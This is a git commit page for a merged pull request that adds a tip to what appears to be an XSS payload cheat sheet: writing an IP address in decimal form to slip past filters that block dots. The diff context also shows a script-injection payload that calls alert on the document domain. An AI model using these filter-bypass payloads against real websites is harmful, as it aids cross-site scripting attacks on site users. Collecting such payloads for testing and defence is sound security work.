Merge pull request #86 from JLLeitschuh/patch-1

Add XSS dot filter bypass with decimal IP
This commit is contained in:
Swissky 2019-08-29 20:12:51 +02:00 committed by GitHub
commit c6824e7aa9
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -557,6 +557,9 @@ You can bypass a single quote with ' in an on mousedown event handler
<script>window['alert'](document['domain'])</script>
```
Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777`
http://www.geektools.com/cgi-bin/ipconv.cgi
### Bypass parenthesis for string
```javascript